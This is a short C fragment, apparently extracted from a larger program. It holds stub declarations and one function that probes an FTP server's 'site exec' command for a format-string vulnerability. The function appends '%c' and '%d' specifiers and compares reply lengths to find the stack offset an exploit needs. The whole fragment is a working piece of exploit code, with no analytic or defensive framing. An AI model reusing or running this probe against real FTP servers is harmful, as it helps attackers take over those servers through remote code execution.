
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 scalar_t__ before_len ;
 int exit (int) ;
 int fprintf (int ,char*) ;
 int ftp_siteexec (int,char*,scalar_t__,int,char*,int) ;
 int snprintf (char*,int,char*,char*,char*) ;
 int stderr ;
 int strcat (char*,char*) ;
 scalar_t__ strlen (char*) ;
 int * strstr (char*,char*) ;

int magic_check_o(int sock, char *str) {
 char q[2048], ans[2048];
  snprintf(q, 2048, "site exec %s%s\r\n", str, "%c");
  if( strstr( q, "\r\n") == ((void*)0)) {
   fprintf(stderr,"Line TOO big..\n");
   exit(-1);
  }
 ftp_siteexec( sock, q, strlen(q), 1, ans, 2048);
 if( before_len== strlen(&ans[3]) ) {
  before_len+=1;
  (void)strcat(str, "%d");
  return 3;
 }
 before_len=strlen(&ans[3]);
 (void)strcat(str,"%c");
 return 2;
}
